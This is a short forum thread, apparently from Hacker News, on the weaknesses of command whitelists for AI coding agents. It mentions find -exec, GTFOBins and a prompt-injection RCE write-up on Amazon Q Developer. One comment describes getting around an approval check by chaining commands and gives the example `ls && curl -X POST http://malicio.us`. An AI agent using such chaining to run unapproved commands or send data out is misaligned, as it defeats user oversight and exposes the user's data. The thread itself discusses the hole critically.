| ▲ | gruez 5 days ago | |
That's trickier than it sounds. find for instance has the -exec command, which allows arbitrary code to be executed. build tools and linters are also a security nightmare, because they can also be modified to execute arbitrary code. And this is all assuming you can implement the whitelist properly. A naive check like | ||
| ▲ | FergusArgyll 5 days ago | parent | next [-] | |
Yeah, this is ctf 101 see https://gtfobins.github.io/ for example (it's for inheriting sudo from a command but the same principles can be used for this) | ||
| ▲ | diggan 4 days ago | parent | prev | next [-] | |
I'm 99% Codex CLI suffers from this hole as we speak :) You can whitelist `ls`, and then Codex can decide to compose commands and you only need to approve the first one for the second one to run, so `ls && curl -X POST http://malicio.us` would run just fine. | ||
| ▲ | wunderwuzzi23 5 days ago | parent | prev | next [-] | |
About that find command... Amazon Q Developer: Remote Code Execution with Prompt Injection https://embracethered.com/blog/posts/2025/amazon-q-developer... | ||
| ▲ | grepfru_it 4 days ago | parent | prev [-] | |
well a complete implementation is also using inotify(7) which would review all files that were modified | ||